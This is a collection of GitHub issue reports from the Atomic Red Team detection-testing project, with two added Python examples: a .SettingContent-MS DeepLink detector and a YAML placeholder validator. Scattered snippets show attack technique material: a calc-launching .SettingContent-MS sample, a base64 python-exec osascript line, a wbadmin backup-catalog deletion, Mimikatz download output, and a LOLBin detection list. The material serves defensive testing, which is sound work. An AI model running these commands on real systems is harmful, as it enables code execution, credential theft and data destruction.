redcanaryco / atomic-red-team
Small and highly portable detection tests based on MITRE's ATT&CK.
License: MIT License
Currently the execution frameworks are not intuitive to help guide someone new to Atomic to know where to begin to run tests.
So perhaps we need to add a quick pointer to each framework with a brief description.
Clicking on any of the links in the home page literally does nothing lol. Specifically of value: Quick Start: Using Atomic Red Team to test your security
Slack channel does not allow users to join: Contact the workspace administrator for an invitation
Seems like a great project and everything, but the documentation is literally nonexistent and so there is no way to use it. Sad.
Example of .SettingContent-MS soon to be added to the ATT&CK Matrix
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>
References:
https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8
https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
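For defenders who want to triage files of this type, the following is an added example (not code from the issue or from the Atomic Red Team project) that parses a .SettingContent-MS document with the standard library and flags a DeepLink that looks like command execution rather than a Settings page. The list of interpreter names and the metacharacter regex are heuristics assumed for this example; the first sample is the XML posted in the issue above, the second is a constructed benign counterpart that deep-links into control.exe.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by SearchableContent in .SettingContent-MS files (from the sample in the issue).
NS = {"sc": "http://schemas.microsoft.com/Search/2013/SettingContent"}

# Heuristic: interpreters and LOLBins that a Settings deep link has no reason to invoke.
# This list is an assumption for the example, not an exhaustive or official one.
SUSPICIOUS_BINARIES = (
    "cmd.exe", "powershell", "pwsh", "mshta", "wscript", "cscript",
    "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec",
)
# " /c " (cmd's run-and-exit switch) and common command separators.
SHELL_METACHARS = re.compile(r"\s/c\s|&&|\|\||[|&;]", re.IGNORECASE)


def extract_deeplinks(xml_text):
    """Return every DeepLink value in the document (there is normally exactly one)."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [el.text.strip() for el in root.iterfind(".//sc:DeepLink", NS) if el.text]


def assess_deeplink(deeplink):
    """Return the reasons a DeepLink looks like command execution; empty list means no finding."""
    reasons = []
    lowered = deeplink.lower()
    for binary in SUSPICIOUS_BINARIES:
        if binary in lowered:
            reasons.append(f"references {binary}")
    if SHELL_METACHARS.search(deeplink):
        reasons.append("contains shell metacharacters")
    return reasons


def scan_settingcontent(xml_text):
    """Return [(deeplink, reasons), ...] for every DeepLink that triggers a heuristic."""
    findings = []
    for deeplink in extract_deeplinks(xml_text):
        reasons = assess_deeplink(deeplink)
        if reasons:
            findings.append((deeplink, reasons))
    return findings


# The sample posted in the issue above (its DeepLink runs cmd.exe to launch calc.exe).
ISSUE_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\\system32\\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
  </SearchableContent>
</PCSettings>
"""

# Constructed benign counterpart: the same file, but the deep link opens a Control Panel page.
BENIGN_SAMPLE = ISSUE_SAMPLE.replace(
    "%windir%\\system32\\cmd.exe /c calc.exe",
    "%windir%\\system32\\control.exe /name Microsoft.System",
)

if __name__ == "__main__":
    for label, sample in (("issue sample", ISSUE_SAMPLE), ("benign sample", BENIGN_SAMPLE)):
        print(label, "->", scan_settingcontent(sample) or "no findings")
```

Run over a directory of downloaded files, the findings list is a reasonable input to a quarantine or alerting step; the heuristics are deliberately narrow so that legitimate files shipped under the Windows Settings app do not trip them.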
I moved the LD_PRELOAD test out of the rootkit technique. I believe this is better described in T1055 Process Injection.
This is a note for me to fix this when I have time.
With the current directory structure, any techniques that work on Windows, Mac, and Linux must be duplicated. This is cumbersome for when one of them changes, as then the other two must also be changed in the same way.
This could be addressed by making a Common directory which contains cross-platform resources. The READMEs in each of the OS-specific directories could then link back to resources in the Common directory.
Unsure if a PR would be better, but I wanted to possibly contribute a new execution framework that is an Ansible plugin.
https://github.com/tuckner/ansible-art
The plugin would be a part of Ansible's software package but would execute atomic techniques across Windows & Linux.
There appears to be a bug in the Get-AtomicTechnique
Get-AtomicTechnique -Path .\atomics\T1117\T1117.yaml
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
325 19 7604 25452 0.56 5652 1 ApplicationFrameHost
158 10 6332 11480 0.73 9048 0 audiodg
329 16 5212 20804 0.06 8380 1 backgroundTaskHost
174 11 2048 8140 0.03 736 1 chrome
142 11 1972 8780 0.03 5896 1 chrome
I expected to create a test.
In the current state, it runs Get-Process and dies.
Windows 10 x64 v1803
@rickardja if you have a chance can you check the code for the Get-AtomicTechnique method, or perhaps we need to update the documentation. Thanks!
https://github.com/hfiref0x/UACME
Might be worth including those in your UAC testing suite.
Atomic Test #13 - wbadmin
"wbdadmin delete catalog -quiet" is not working.
wbdadmin should be wbadmin instead.
OS: Windows10 Enterprise.
Hi, when executing a test on a Windows system I get a failure on test report creation because the script tries to create a file with an invalid name:
` - Writing results to atomic-test-executor-execution-2018-08-29T20:55:26Z.yaml
FATAL ERROR: Invalid argument @ rb_sysopen - atomic-test-executor-execution-2018-08-29T20:55:26Z.yaml`
Is there a possibility of adding a JSON output of the current Markdowns?
I have made an attempt using md_to_json via: pip install markdown_to_json
However the tool (md_to_json) itself isn't properly suited. So there has been some modification to the layout of the markdowns to get the expected output.
linked from https://github.com/redcanaryco/atomic-red-team/tree/master/Windows
is 404
it should be
Presently, each test is fairly static.
A recent presentation by @danielbohannon and @matthewdunwoody
https://www.slideshare.net/DanielBohannon2/signaturesaredead-long-live-resilient-signatures
serves as a reminder that tests need to be more dynamic, lest defenders get complacent with current detections.
I propose some sort of dynamic configuration file that can be applied to a test. To change things like file name, command line arguments, etc...
Open to feedback. Just wanted to track as an issue to come back to when we have time.
I think this test should create a share then delete it. For completeness
atomic-red-team/atomics/T1002/T1002.yaml
while scanning an alias
in "", line 34, column 16:
default: *.docx
^
expected alphabetic or numeric character, but found '.'
in "", line 34, column 17:
default: *.docx
^
A bit of googling suggests that if you want to have * at the beginning you will need to put it in quotes.
In this test case, the Linux test is missing the test prologue.
This causes a parsing error "Duplicate Key" when parsing the yaml
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.yaml#L91
After further review, T1074 is a complete mess. The last two tests (PowerShell and Linux) need to be reworked.
When you download the Atomic Repo, Windows will block many scripts. This is a normal default mechanism to prevent some material from the internet from executing.
In order to overcome this, perhaps we can add this to our Invoke-AtomicRedTeam module:
Get-ChildItem -Path 'C:\AtomicRedTeam' -Recurse | Unblock-File
A question was posed in the Atomic Channel about checking whether or not a test requires admin (Windows) or root privileges.
I support this idea. Just need to think through where to put that check.
Update validation scripts
Retroactively update all existing tests to have this added.
Create a simple test to create and execute 3-4 tests.
Use case: Someone just wants a quick way to run Atomic Red Team.
T1086 Atomic Test #6 is false. The correct way is to first execute $Password = Read-Host -AsSecureString, then execute New-LocalUser -FullName 'full_name' -Name 'user_name' -Password $password -Description 'description'
and the truth is: run it with powershell, not with command_prompt. Your introduction is wrong.
ℹ Please replace this with what you did.
New-LocalUser -FullName 'full_name' -Name 'user_name' -Password $password -Description 'description'
ℹ Please replace this with what you expected to happen.
Successfully created an account
ℹ Please replace this with of what happened instead.
error info:
New-LocalUser : 无法绑定参数“Password”。无法将“System.String”类型的“password”值转换为“System.Security.SecureString”类型。
Which specific operating system are you running (e.g. Windows 7 SP1 32-bit)?
win10 1709
Did you run the test from an elevated or root prompt?
yes
If relevant, which atomic test is this specific to?
T1086 Atomic Test #6
If relevant, which execution harness are you attempting to use?
powershell
Run https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/Get-Keystrokes.ps1
Script ¿should? log keystrokes at key.log
nothing
As reported in the Atomic Slack Channel, Test T1122 COM hijack needs a new CLSID.
{372FCE38-4324-11D0-8810-00A0C903B83C} is no longer viable.
Probably the best plan forward is to just rewrite this test to look for reg mods of existing CLSIDs
references:
https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/
https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com
T1099
the target_filename input parameter does not have a default value.
Thanks
Sometimes we use powershell, powershell.exe and sometimes nothing.
We need to review each powershell test and choose a consistent pattern.
Compare 1086, 1050 and 1098 for examples.
Afternoon
I have been using msxsl.exe lately and it's been quite effective. I looked through all your red team stuff and couldn't find it. Below are some references for you, maybe you can add it to your lists.
Anyways food for thought.
I have a problem with this technique. I tested DLL (Win32/x64) files using the Mavinject command but it isn't working right. I used notepad.exe for the ProcessID and also disabled my anti-virus solution. Got any suggestions?
For every reg.exe add, you need a reg.exe delete to clean up the target system.
The Following Techniques Need to Be Corrected.
1042
1053
1065
1075
1103
1124
1191
There are inconsistencies in the input_arguments and the command property.
Example: T1042
---
attack_technique: T1042
display_name: Change Default File Association
atomic_tests:
- name: Change Default File Association
  description: |
    Change Default File Association From cmd.exe
  supported_platforms:
    - windows
  input_arguments:
    extension_to_change:
      description: File Extension To Hijack
      type: String
      default: .wav
    target_exenstion_handler:                                      <<<<<<<< THIS SHOULD MATCH
      description: Thing To Open
      type: Path
      default: C:\Program Files\Windows Media Player\wmplayer.exe
  executor:
    name: command_prompt
    command: |
      cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"  <<<<<< THIS
target_extension_handler should be renamed to thing_to_execute, or vice versa.
My recommendation is once we fix these that the validation routine be updated to check this.
As discussed in the Channel it would be great to have a the ability to check a dependency is on the box you are running the test from. For example LOLbins such as mavinject (T1055). In my testing (Win10 Enterprise x64) this is not always installed by default unless you have installed a click to run MS installer.
In reviewing this page:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/linux-index.md
I found that nearly all the Lateral Movement tests (as well as others on the page) are pointed to a dead link:
https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTING.md
Once all url references are fixed we can merge this branch
https://github.com/redcanaryco/atomic-red-team/tree/Discovery
example:
atomic-red-team/atomics/T1074/T1074.yaml
Line 16 in 7aa0e28
S/b updated to
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat
Hi All,
Please forgive my newbie-ness, if this is not the correct forum for this idea or if the functionality I’m explaining below doesn’t already exist, please let me know. I noticed the “Generate All Tests” code on this page: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks/Invoke-AtomicRedTeam
I am looking for a simple command to run many or all tests applicable by OS that creates a test report to compare to. I’m thinking there are many people like me who just want to quickly test my shiny new detection method (EDR tool, sysmon setup or SIEM integration) by running one simple command. I’m really hoping the command will output a report. The report can be then used to support a manual comparison to shiny new detection method on a wide scale of techniques post-execution. I think having this functionality easily accessible and documented will be great.
The command should:
• Run a list of tests, all tests by tactic or all tests (default).
• Insert some delay time in between each command execution, perhaps 1 minute default. This will allow for greater confidence in detection when comparing shiny new detection method to test output report.
• *Add command execution validation (Ex/ T1117 did a new instance of calc.exe execute?) Being so new to the framework, I’m assuming not all techniques pop calc.exe.
• Output a CSV or XML report of actions. Report Fields:
• Include techniques with missing tests as “No Atomic Test Available – Please submit a test! https://github.com/redcanaryco/atomic-red-team/blob/master/docs/contributing.md#how-to-contribute” in output
• Summary: Number of tests completed/successful, failed, not applicable, missing tests (by tactic and total)
• Can be user interactive or non-interactive to bypass prompts
Questions for community:
I noticed the code Invoke-AtomicRedTeam\Public\Invoke-AtomicTest.ps1
has a “foreach ($technique in $AtomicTechnique)” and “foreach ($test in $technique.atomic_tests)” loops but it is not intuitive to how to run and I don’t see a report output option. See #432
Thank you!
Example: T1002
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml
input arguments are:
input_arguments:
  input_file:
    description: Path that should be compressed into our output file
    type: Path
    default: C:\*
the input_file variable then contains the following based on parsing the yaml:
{'description': 'Path that should be compressed into our output file', 'type': 'Path', 'default': 'C:\\*'}
command then takes:
executor:
  name: powershell
  command: |
    dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
thus you are passing a dict to the command part
I assume it should be something like #{input_file.default} or #{input_file['default']}, whatever makes sense here.
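Both this issue and the T1042 one above (input_arguments names that do not match the #{...} placeholders in the command) come down to the same two operations on a parsed test: validating that every placeholder has a declared argument with a default, and rendering the command by substituting the argument's default rather than the whole dict. The following is an added example of both, not code from the project or its execution frameworks; the test dicts are written out in the shape yaml.safe_load returns for the YAML quoted in the issues, and the output_file default for T1002 is a constructed value because the issue only shows input_file. The validator also reports an argument with no default, the problem raised for T1099 further up.

```python
import re

# Matches the #{argument_name} placeholders used in atomic test commands.
PLACEHOLDER = re.compile(r"#\{([A-Za-z0-9_]+)\}")


def placeholders_in(command):
    """Set of argument names referenced by a command string."""
    return set(PLACEHOLDER.findall(command))


def validate_test(test):
    """Return a list of problems where input_arguments and the command disagree."""
    args = test.get("input_arguments") or {}
    used = placeholders_in(test["executor"]["command"])
    problems = []
    for name in sorted(used - set(args)):
        problems.append(f"command uses #{{{name}}} but input_arguments does not declare it")
    for name in sorted(set(args) - used):
        problems.append(f"input_arguments declares {name} but the command never uses it")
    for name, spec in args.items():
        if "default" not in spec:
            problems.append(f"input_arguments.{name} has no default value")
    return problems


def render_command(test, overrides=None):
    """Substitute each placeholder with the argument's default (or a caller override), never the raw dict."""
    args = test.get("input_arguments") or {}
    overrides = overrides or {}

    def value_for(match):
        name = match.group(1)
        if name in overrides:
            return str(overrides[name])
        if name not in args or "default" not in args[name]:
            raise KeyError(f"no value for #{{{name}}}")
        return str(args[name]["default"])

    return PLACEHOLDER.sub(value_for, test["executor"]["command"]).rstrip("\n")


# The T1042 test from the issue above, as yaml.safe_load would return it (typo in the key name preserved).
T1042_TEST = {
    "name": "Change Default File Association",
    "supported_platforms": ["windows"],
    "input_arguments": {
        "extension_to_change": {"description": "File Extension To Hijack", "type": "String", "default": ".wav"},
        "target_exenstion_handler": {
            "description": "Thing To Open",
            "type": "Path",
            "default": r"C:\Program Files\Windows Media Player\wmplayer.exe",
        },
    },
    "executor": {
        "name": "command_prompt",
        "command": 'cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"\n',
    },
}

# The T1002 test from this issue; output_file's default is constructed for the example.
T1002_TEST = {
    "name": "T1002 example (constructed name)",
    "supported_platforms": ["windows"],
    "input_arguments": {
        "input_file": {"description": "Path that should be compressed into our output file",
                       "type": "Path", "default": r"C:\*"},
        "output_file": {"description": "Constructed default for the example",
                        "type": "Path", "default": r"C:\Temp\atomic-out.zip"},
    },
    "executor": {
        "name": "powershell",
        "command": "dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}\n",
    },
}

if __name__ == "__main__":
    for test in (T1042_TEST, T1002_TEST):
        print(test["name"])
        for problem in validate_test(test) or ["ok"]:
            print("  ", problem)
    print(render_command(T1002_TEST))
```

Wiring validate_test into the repository's validation script would catch the T1042-style mismatch at pull-request time, and render_command is the substitution step an execution framework should apply before handing the string to the executor named in the test.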
https://attack.mitre.org/wiki/Technique/T1036
Can be achieved by copying one process to have the filename of a Windows system process for execution. Essentially impersonating a Windows system process.
We identified that the matrices were out of date (missing T1220, for example) and it is possibly caused by the ATT&CK API change.
We need to create a NuGetApiKey for publishing Invoke-AtomicRedTeam to powershellgallery.com. This also requires an update for circleci YAML.
Per Josh Rickard (MSAdministrator), he's provided an example AppVeyor configuration for this:
https://github.com/MSAdministrator/PSNamedPipe/blob/master/appveyor.yml
T1127 MSBuild Bypass Using Inline Tasks Test needs path pointing to src
Currently just has file name
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.yaml#L14
Should be relative or full path
Validation script errors on /atomic_red_team/atomic_test_template.yaml
Suggested Fix:
Create an Exclusion for that file.
@brianebeyer thoughts?
Example Output:
Validating ./atomic_red_team/atomic_test_template.yaml...FAIL
atomic_tests[0].name
contains a TODO
The example test on the main page does not work. The URL seems to be case-sensitive, and instead of:
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/t1117/RegSvr32.sct
it should be
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
(Tested on Windows 7)
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1122/T1122.yaml
This is the completely wrong test.
Ran test T1155 and got this error, -sh: syntax error near unexpected token `'ignore''
osascript "do shell script "echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));" | python &""
Atomic test T1155 executes
-sh: syntax error near unexpected token `'ignore''
MacOS High Sierra version 10.13.6
https://github.com/redcanaryco/atomic-red-team/blob/yaml-cs/atomics/T1002/T1002.yaml
If I'm reading the various yamls correctly you are setting the executor: powershell
and then NOT specifying the executor in the command. Looks like you just have a rogue powershell.exe in this one.
Run 'chain_reaction_DragonsTail.ps1'
Receive all SUCCESS notifications
PS C:\Users<redacted>\Desktop> .\chain_reaction_DragonsTail.ps1
SUCCESS: The scheduled task "Atomic Testing" has successfully been created.
SUCCESS: Attempted to run the scheduled task "Atomic Testing".
SUCCESS: The scheduled task "Atomic Testing" was successfully deleted.
powershell.exe : Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."
At C:\Users<redacted>\Desktop\chain_reaction_DragonsTail.ps1:21 char:1
+ CategoryInfo : NotSpecified: (Exception calli...04) Not Found.":String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
At line:1 char:1
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:157
~~~~~~~~~~~~~~~
Windows 10 64-bit
https://github.com/redcanaryco/atomic-red-team/blob/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
Callouts to this repo for binaries result in 404.
I think each test needs to provide a cleanup mechanism. We can decide whether to include that in the executor.command or as a separate yaml property.
Example: T1050 Creates a Service, but makes no attempt to clean up.
I propose something like this for T1050:
sc.exe create
sc.exe start
sc.exe stop
sc.exe delete
To be complete each test should stand alone.
I think this is best practice. @brianebeyer , I would be interested in your thoughts here.
The use of a tag with a release would facilitate the integration of atomic red team in Kali, see https://bugs.kali.org/view.php?id=4525
Related Github doc: https://help.github.com/articles/about-releases/
Thanks!
I think T1126.yaml needs to be adjusted, the YAML file has two top level "atomic_tests" nodes instead of one.
per request moving this over from twitter
ref:
https://twitter.com/carnal0wnage/status/994594132747317248
CG
are you guys planning to support multiple commands in a single command item? T1105.yaml has multiple commands. perhaps they could each be an element in a list (like you are doing for supported_platforms). right now you'd/I have to account for # and blank lines
BB
Take a look at https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/t1089/t1089.yaml … - isn’t completely in line with new spec yet but you’ll see the command is multiline.
Our thought was “write your commands like you’d write them in a bat/powershell/sh script and executors can invoke them as if a single script”
CG
hmmm how do you anticipate the executor invoking those? taking the blob and writing to a file and exec'ing? how would i exec all that if i only had ssh?
BB
For ssh, I think a heredoc works. Imagine the ssh+bash executor doing
ssh user@host bash <<'EOF'
<< the contents of the executor.command >>
EOF